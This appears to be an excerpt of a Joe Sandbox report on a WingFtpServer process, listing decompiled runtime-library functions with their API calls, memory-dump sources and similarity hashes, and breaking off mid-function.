                                                                                                                                                                                                  0x03ad22b6
                                                                                                                                                                                                  0x03ad22d6
                                                                                                                                                                                                  0x03ad22e2
                                                                                                                                                                                                  0x03ad22e5
                                                                                                                                                                                                  0x03ad2352
                                                                                                                                                                                                  0x03ad2358
                                                                                                                                                                                                  0x03ad2359
                                                                                                                                                                                                  0x03ad235f
                                                                                                                                                                                                  0x03ad2360
                                                                                                                                                                                                  0x03ad2362
                                                                                                                                                                                                  0x03ad2367
                                                                                                                                                                                                  0x03ad236b
                                                                                                                                                                                                  0x03ad236d
                                                                                                                                                                                                  0x03ad236d
                                                                                                                                                                                                  0x03ad2378
                                                                                                                                                                                                  0x03ad2383
                                                                                                                                                                                                  0x03ad238e
                                                                                                                                                                                                  0x03ad2397
                                                                                                                                                                                                  0x03ad239a
                                                                                                                                                                                                  0x03ad23b6
                                                                                                                                                                                                  0x03ad23bd
                                                                                                                                                                                                  0x03ad23c8
                                                                                                                                                                                                  0x03ad23df
                                                                                                                                                                                                  0x03ad23e4
                                                                                                                                                                                                  0x03ad23f8
                                                                                                                                                                                                  0x03ad23fd
                                                                                                                                                                                                  0x03ad2410
                                                                                                                                                                                                  0x03ad2410
                                                                                                                                                                                                  0x03ad2419
                                                                                                                                                                                                  0x03ad239c
                                                                                                                                                                                                  0x03ad239c
                                                                                                                                                                                                  0x03ad239d
                                                                                                                                                                                                  0x03ad23a3
                                                                                                                                                                                                  0x03ad23a9
                                                                                                                                                                                                  0x03ad23ab
                                                                                                                                                                                                  0x03ad23ad
                                                                                                                                                                                                  0x03ad23b0
                                                                                                                                                                                                  0x03ad23b3
                                                                                                                                                                                                  0x03ad23b3
                                                                                                                                                                                                  0x03ad23b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad23b6
                                                                                                                                                                                                  0x03ad22e7
                                                                                                                                                                                                  0x03ad22e7
                                                                                                                                                                                                  0x03ad22e8
                                                                                                                                                                                                  0x03ad22ea
                                                                                                                                                                                                  0x03ad22f0
                                                                                                                                                                                                  0x03ad22f2
                                                                                                                                                                                                  0x03ad2301
                                                                                                                                                                                                  0x03ad2302
                                                                                                                                                                                                  0x03ad230c
                                                                                                                                                                                                  0x03ad230d
                                                                                                                                                                                                  0x03ad2312
                                                                                                                                                                                                  0x03ad231d
                                                                                                                                                                                                  0x03ad231e
                                                                                                                                                                                                  0x03ad2328
                                                                                                                                                                                                  0x03ad2329
                                                                                                                                                                                                  0x03ad232e
                                                                                                                                                                                                  0x03ad2349
                                                                                                                                                                                                  0x03ad234b
                                                                                                                                                                                                  0x03ad234c
                                                                                                                                                                                                  0x03ad234f
                                                                                                                                                                                                  0x03ad234f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ad22f0
                                                                                                                                                                                                  0x03ad22e5

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 03AD230D
                                                                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 03AD2329
                                                                                                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 03AD2362
                                                                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 03AD23DF
                                                                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 03AD23F8
                                                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 03AD2433
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 351091851-0
                                                                                                                                                                                                  • Opcode ID: 03f32c286d9be2e12a52b8590dba48c6f326077e3a264a58fa0a438f2d3596ff
                                                                                                                                                                                                  • Instruction ID: 0874b7fa8653bfe35ca3701d4d1afb894542c54e8df9ae52176805dfb600271f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03f32c286d9be2e12a52b8590dba48c6f326077e3a264a58fa0a438f2d3596ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB51C579A006299FCB66DB58C980BD9B3FCAF4C200F4445DAE50AEB311D630AF85CF61
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC1670 Relevance: 9.1, APIs: 6, Instructions: 83fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AC1670(void* __eax, void* __ecx, char __edx) {
				long _t16;
				void* _t18;
				void* _t20;
				signed int _t22;
				signed int _t27;
				WCHAR* _t28;
				char* _t29;

				 *_t29 = __edx;
				_t22 = 0;
				_t28 = E03AAA8E4(__eax);
				_t27 = GetFileAttributesW(_t28);
				if(_t27 == 0xffffffff) {
					_t16 = GetLastError();
					if(_t16 == 2 || _t16 == 3 || _t16 == 0xa1 || _t16 == 0x7b || _t16 == 0x35 || _t16 == 0x15 || _t16 == 0x43) {
						_t22 = 0;
					} else {
						_t22 = 1;
					}
				} else {
					if((_t27 & 0x00000400) != 0) {
						if( *_t29 == 0) {
							if((_t27 & 0x00000010) == 0) {
								_t18 = CreateFileW(_t28, 0x80000000, 1, 0, 3, 0x2000000, 0);
								if(_t18 == 0xffffffff) {
									_t22 = 1;
								} else {
									CloseHandle(_t18);
									_t22 = 0;
								}
							} else {
								_t22 = 1;
							}
						} else {
							_t20 = CreateFileW(_t28, 0x80000000, 1, 0, 3, 0x2000000, 0);
							if(_t20 != 0xffffffff) {
								CloseHandle(_t20);
								_t22 = 0 | (_t27 & 0x00000010) != 0x00000000;
							}
						}
					} else {
						_t22 = 0 | (_t27 & 0x00000010) != 0x00000000;
					}
				}
				return _t22;
			}










                                                                                                                                                                                                  0x03ac1675
                                                                                                                                                                                                  0x03ac167a
                                                                                                                                                                                                  0x03ac1683
                                                                                                                                                                                                  0x03ac168b
                                                                                                                                                                                                  0x03ac1690
                                                                                                                                                                                                  0x03ac1717
                                                                                                                                                                                                  0x03ac171f
                                                                                                                                                                                                  0x03ac1741
                                                                                                                                                                                                  0x03ac1745
                                                                                                                                                                                                  0x03ac1745
                                                                                                                                                                                                  0x03ac1745
                                                                                                                                                                                                  0x03ac1696
                                                                                                                                                                                                  0x03ac169c
                                                                                                                                                                                                  0x03ac16b0
                                                                                                                                                                                                  0x03ac16e6
                                                                                                                                                                                                  0x03ac16ff
                                                                                                                                                                                                  0x03ac1707
                                                                                                                                                                                                  0x03ac1713
                                                                                                                                                                                                  0x03ac1709
                                                                                                                                                                                                  0x03ac170a
                                                                                                                                                                                                  0x03ac170f
                                                                                                                                                                                                  0x03ac170f
                                                                                                                                                                                                  0x03ac16e8
                                                                                                                                                                                                  0x03ac16e8
                                                                                                                                                                                                  0x03ac16e8
                                                                                                                                                                                                  0x03ac16b2
                                                                                                                                                                                                  0x03ac16c5
                                                                                                                                                                                                  0x03ac16cd
                                                                                                                                                                                                  0x03ac16d0
                                                                                                                                                                                                  0x03ac16db
                                                                                                                                                                                                  0x03ac16db
                                                                                                                                                                                                  0x03ac16cd
                                                                                                                                                                                                  0x03ac169e
                                                                                                                                                                                                  0x03ac16a4
                                                                                                                                                                                                  0x03ac16a4
                                                                                                                                                                                                  0x03ac169c
                                                                                                                                                                                                  0x03ac174e

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,03BC517B,00000000,03BC5BD0,?,?,?,?,000000C3,00000000,00000000), ref: 03AC1686
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,03BC517B,00000000,03BC5BD0), ref: 03AC16C5
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,03BC517B,00000000), ref: 03AC16D0
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,?,?,03BC517B,00000000,03BC5BD0,?,?,?,?,000000C3,00000000,00000000), ref: 03AC1717
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$AttributesCloseCreateErrorHandleLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2927643983-0
                                                                                                                                                                                                  • Opcode ID: d5c61fc84cf17087ab30b3c3a8d81459e976dc3ec313a197b82faf460b5f26dd
                                                                                                                                                                                                  • Instruction ID: a8ed4eb23b177a97ccd99704853667c1ae7ce3561f2dee5b2566c78060913750
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5c61fc84cf17087ab30b3c3a8d81459e976dc3ec313a197b82faf460b5f26dd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33110135B753C428FA36E2685CC5BBA915D4B03320F3C0A2FFA54BA2C3C988E481AC15
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA6234 Relevance: 9.1, APIs: 6, Instructions: 51fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                  			E03AA6234(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x3bd305c == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L03AA520C();
				} else {
					_t7 = E03AAA0EC(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x3bce06c; // 0x3aa53a4
					_t12 = E03AAA0EC(_t11);
					_t13 =  *0x3bce06c; // 0x3aa53a4
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E03AAA0EC(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                                                                                                                                                  0x03aa6234
                                                                                                                                                                                                  0x03aa6237
                                                                                                                                                                                                  0x03aa6239
                                                                                                                                                                                                  0x03aa6242
                                                                                                                                                                                                  0x03aa62a5
                                                                                                                                                                                                  0x03aa62aa
                                                                                                                                                                                                  0x03aa62ab
                                                                                                                                                                                                  0x03aa62ac
                                                                                                                                                                                                  0x03aa62ae
                                                                                                                                                                                                  0x03aa6244
                                                                                                                                                                                                  0x03aa624d
                                                                                                                                                                                                  0x03aa625c
                                                                                                                                                                                                  0x03aa6268
                                                                                                                                                                                                  0x03aa626d
                                                                                                                                                                                                  0x03aa6273
                                                                                                                                                                                                  0x03aa6281
                                                                                                                                                                                                  0x03aa628f
                                                                                                                                                                                                  0x03aa629e
                                                                                                                                                                                                  0x03aa629e
                                                                                                                                                                                                  0x03aa62b6

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,03AA53A8,00000000,?,00000000,?,?,00000000,03AA6BDF), ref: 03AA6256
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,03AA53A8,00000000,?,00000000,?,?,00000000,03AA6BDF), ref: 03AA625C
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,03AA53A4,00000000,?,00000000,00000000,000000F4,03AA53A8,00000000,?,00000000,?,?,00000000,03AA6BDF), ref: 03AA627B
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,03AA53A4,00000000,?,00000000,00000000,000000F4,03AA53A8,00000000,?,00000000,?,?,00000000,03AA6BDF), ref: 03AA6281
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,03AA53A4,00000000,?,00000000,00000000,000000F4,03AA53A8,00000000,?), ref: 03AA6298
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,03AA53A4,00000000,?,00000000,00000000,000000F4,03AA53A8,00000000), ref: 03AA629E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileHandleWrite
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3320372497-0
                                                                                                                                                                                                  • Opcode ID: d6d831895c927fd98b15b46204ba8b066cf153d8df4612db38fda8c97eec9a9a
                                                                                                                                                                                                  • Instruction ID: 45bf299c08c0c1ebf3d1c43e5e1ddc225e8ab1a28a5f6eb55c54748a8dfbca88
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6d831895c927fd98b15b46204ba8b066cf153d8df4612db38fda8c97eec9a9a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6101CDABA047107EE124F26C9E84F5B26CC8B49624F2046137658DF2D1C7548C04DBB5
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC6920 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                                                  			E03AC6920(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				struct HINSTANCE__* _t44;
				intOrPtr _t55;
				struct HINSTANCE__* _t57;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x3ac6acc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					_t44 =  *0x3bd6634; // 0x3aa0000
					GetModuleFileNameW(_t44,  &_v1056, 0x105);
					_v12 = E03AC6914(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E03AC1B80( &_v534, 0x104, E03AC852C() + 2);
				_t83 = 0x3ac6ae0;
				_t100 = 0x3ac6ae0;
				_t95 =  *0x3ab9868; // 0x3ab98c0
				if(E03AA7F4C(_t102, _t95) != 0) {
					_t83 = E03AAA8E4( *((intOrPtr*)(_t102 + 4)));
					_t76 = E03AAA100(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x3ac6ae4;
					}
				}
				_t55 =  *0x3bd25c0; // 0x3ab2af4
				_t18 = _t55 + 4; // 0xffec
				_t57 =  *0x3bd6634; // 0x3aa0000
				LoadStringW(E03AAC530(_t57),  *_t18,  &_v1568, 0x100);
				E03AA7A20( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E03AC1E90(4,  &_v1636);
				E03AAA100(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x3ac6ad3);
				return E03AA9C1C( &_v1640);
			}































                                                                                                                                                                                                  0x03ac692e
                                                                                                                                                                                                  0x03ac6934
                                                                                                                                                                                                  0x03ac6937
                                                                                                                                                                                                  0x03ac6939
                                                                                                                                                                                                  0x03ac693d
                                                                                                                                                                                                  0x03ac693e
                                                                                                                                                                                                  0x03ac6943
                                                                                                                                                                                                  0x03ac6946
                                                                                                                                                                                                  0x03ac6953
                                                                                                                                                                                                  0x03ac6962
                                                                                                                                                                                                  0x03ac698c
                                                                                                                                                                                                  0x03ac6992
                                                                                                                                                                                                  0x03ac699e
                                                                                                                                                                                                  0x03ac69a3
                                                                                                                                                                                                  0x03ac69a9
                                                                                                                                                                                                  0x03ac69a9
                                                                                                                                                                                                  0x03ac69cb
                                                                                                                                                                                                  0x03ac69d0
                                                                                                                                                                                                  0x03ac69d5
                                                                                                                                                                                                  0x03ac69dc
                                                                                                                                                                                                  0x03ac69e9
                                                                                                                                                                                                  0x03ac69f3
                                                                                                                                                                                                  0x03ac69f7
                                                                                                                                                                                                  0x03ac69fe
                                                                                                                                                                                                  0x03ac6a08
                                                                                                                                                                                                  0x03ac6a08
                                                                                                                                                                                                  0x03ac69fe
                                                                                                                                                                                                  0x03ac6a19
                                                                                                                                                                                                  0x03ac6a1e
                                                                                                                                                                                                  0x03ac6a22
                                                                                                                                                                                                  0x03ac6a2d
                                                                                                                                                                                                  0x03ac6a3a
                                                                                                                                                                                                  0x03ac6a45
                                                                                                                                                                                                  0x03ac6a4b
                                                                                                                                                                                                  0x03ac6a58
                                                                                                                                                                                                  0x03ac6a5e
                                                                                                                                                                                                  0x03ac6a68
                                                                                                                                                                                                  0x03ac6a6e
                                                                                                                                                                                                  0x03ac6a75
                                                                                                                                                                                                  0x03ac6a7b
                                                                                                                                                                                                  0x03ac6a82
                                                                                                                                                                                                  0x03ac6a88
                                                                                                                                                                                                  0x03ac6aa4
                                                                                                                                                                                                  0x03ac6aac
                                                                                                                                                                                                  0x03ac6ab5
                                                                                                                                                                                                  0x03ac6ab8
                                                                                                                                                                                                  0x03ac6abb
                                                                                                                                                                                                  0x03ac6acb

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,03AC6ACC), ref: 03AC6953
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 03AC6977
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(MZP,?,00000105), ref: 03AC6992
                                                                                                                                                                                                  • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 03AC6A2D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                  • String ID: MZP
                                                                                                                                                                                                  • API String ID: 3990497365-2889622443
                                                                                                                                                                                                  • Opcode ID: 1ae08763943b2dad63d7725a7cac8ad8001dd624bd987a86ba8ce45449da3013
                                                                                                                                                                                                  • Instruction ID: 9f3b509a123d1b02b2993d2c4cbf8b72d7d39fe9ee6fdb159221088ada1890f2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ae08763943b2dad63d7725a7cac8ad8001dd624bd987a86ba8ce45449da3013
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB410975A007589FDB20EF68CD80BDAB7F9AB48200F4484EAE508EB351D7769E94CF50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AD8964 Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                                                  			E03AD8964(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E03AD9BE4(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E03AD9BE4(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E03AD1618(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x3bd0766 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L03ACFB80();
													_push(_t360);
													_push(0x3ad8d5c);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E03AD28E0( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E03AD1520(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x3bd0766 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(E03AD8D91);
													return E03AD1CA0( &_v48);
												}
											}
										} else {
											E03AD1618(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L03ACFB80();
										_push(_t360);
										_push(0x3ad8ca3);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E03AD28E0( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E03AD1520(_t294);
										}
										_v9 = E03AD877C( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(E03AD8D91);
										return E03AD1CA0( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x3bd0766 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L03ACFB80();
										_push(_t360);
										_push(0x3ad8bfe);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E03AD28E0( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E03AD1520(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x3bd0766 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(E03AD8D91);
										return E03AD1CA0( &_v48);
									}
								}
							} else {
								E03AD1618(__ecx);
								goto L41;
							}
						} else {
							_v9 = E03AD84FC(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E03AD84E8(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
